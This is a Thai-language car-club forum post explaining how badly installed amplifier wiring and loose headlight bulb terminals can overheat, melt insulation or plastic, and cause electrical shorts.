หรือบางครั้งพบว่าท่านเจ้าของรถไปให้ช่างเครื่องเสียงต่อเพิ่มเติมระบบเครื่องแอมป์ แล้วเกิดตัดต่อสายไฟไม่ถูกต้องตามหลักวิชาไฟฟ้า ไม่ว่าจะเป็นการกำหนดสายไฟที่ต้องทนกับการใช้กระแสไฟสูงๆ เมื่อเครื่องเสียงใช้กระแสไฟจำนวนมาก ทำให้สายไฟร้อนจนชนวนละลาย เกิดการช๊อร์ทกับกราวด์ก็มี หรือตามขั่วของปลั๊กหลอดไฟ เช่นหลอดไฟหน้ารถที่ใช้กระแสมาก เกิดขั่วหลวม ทำให้กระแสไฟไหลผ่านไม่สะดวก เกิดความร้อนระหว่างจุดสัมผัสของขั่วหลอดไฟที่เป็นแบบพลาสติคละลาย ทำให้ขาหลอดช๊อร์ทกัน เพราะตัวพลาสติคที่ละลายเป็นผงถ่านแข็งๆ กลายเป็นตัวนำของกระแสไฟ
ก็เป็นการตรวจสอบหาเหตุที่ทำให้เกิดอาการดังที่ท่านเจ้าของรถมีปัญหา มาแนะนำกันเคร่าๆครับ ……..srithanon
ได้รับคำขอบคุณจาก: Thard  N_J Civic 
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.